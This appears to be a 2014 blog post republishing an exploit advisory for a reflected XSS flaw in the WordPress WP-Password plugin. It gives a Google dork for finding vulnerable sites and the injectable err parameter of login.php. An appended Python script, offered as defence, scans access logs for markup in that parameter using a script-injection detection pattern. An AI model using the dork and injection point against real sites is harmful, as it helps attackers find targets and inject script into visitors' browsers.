Sunday, June 22, 2014

XSS vulnerability in WordPress

Hey guys, I wanted to share with you a vulnerability in a WordPress plugin I found.

# WordPress WP-Password Plugin XSS Vulnerability

###########################

[+] Exploit Title: WordPress WP-Password Plugin XSS Vulnerability
[+] Find: 2014
[+] Category: WebApp
[+] Google Dork: inurl:"/wp-content/plugins/wp-password/login.php"
[+] Tested On: Windows - Linux
[+] Site:

###########################################
###########################################

# Type: XSS Vulnerability

# Exploit: http://Site.com/{Path}/wp-content/plugins/wp-password/login.php?err={Your Text}

# Explanation: Copy The Dork In Google - Open A Site - Delete All Texts After login.php

Copy This Code At The End Of The Url: ?err={Your Text} - And End

###########################################
###########################################
Greets to: all hackers, newbies and lamers ;p
###########################################
###########################################

This exploit works exceptionally well.
If any of you have any ideas to add to this or want to share your own exploits, please drop them down in the comments. Would love to hear back from you guys.
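
For site owners who run this plugin, here is an added example (not part of the original post and not the plugin's code) that scans web-server access-log lines for requests to the plugin's login.php whose err parameter carries HTML markup instead of a plain message. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Path and parameter named in the advisory above.
PLUGIN_PATH = "/wp-content/plugins/wp-password/login.php"
PARAM = "err"

# Client address and request target from a combined-format log entry (assumed format).
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Characters and tokens a plain-text error message should not need and that
# let a reflected value break out of HTML text or an attribute.
MARKUP_RE = re.compile(r'[<>"\'`]|javascript:|\bon\w+\s*=', re.IGNORECASE)

def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(log_lines):
    """Return (client, decoded err value) for requests that put markup in ?err=."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith(PLUGIN_PATH):
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            value = decode_fully(raw)
            if MARKUP_RE.search(value):
                hits.append((client, value))
    return hits

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Jun/2014:10:00:01 +0000] "GET /blog/wp-content/plugins/wp-password/login.php?err=Wrong+password HTTP/1.1" 200 512',
    '203.0.113.9 - - [22/Jun/2014:10:00:07 +0000] "GET /blog/wp-content/plugins/wp-password/login.php?err=%3Cb%3Ehi%3C%2Fb%3E HTTP/1.1" 200 530',
    '198.51.100.2 - - [22/Jun/2014:10:01:12 +0000] "GET /wp-content/plugins/wp-password/login.php?err=%253Cscript%253E HTTP/1.1" 200 540',
    '198.51.100.7 - - [22/Jun/2014:10:02:30 +0000] "GET /index.php?err=%3Cb%3E HTTP/1.1" 200 100',
]
```

The pattern is deliberately strict, so a legitimate message containing an apostrophe or quote will also be flagged and should be reviewed by hand.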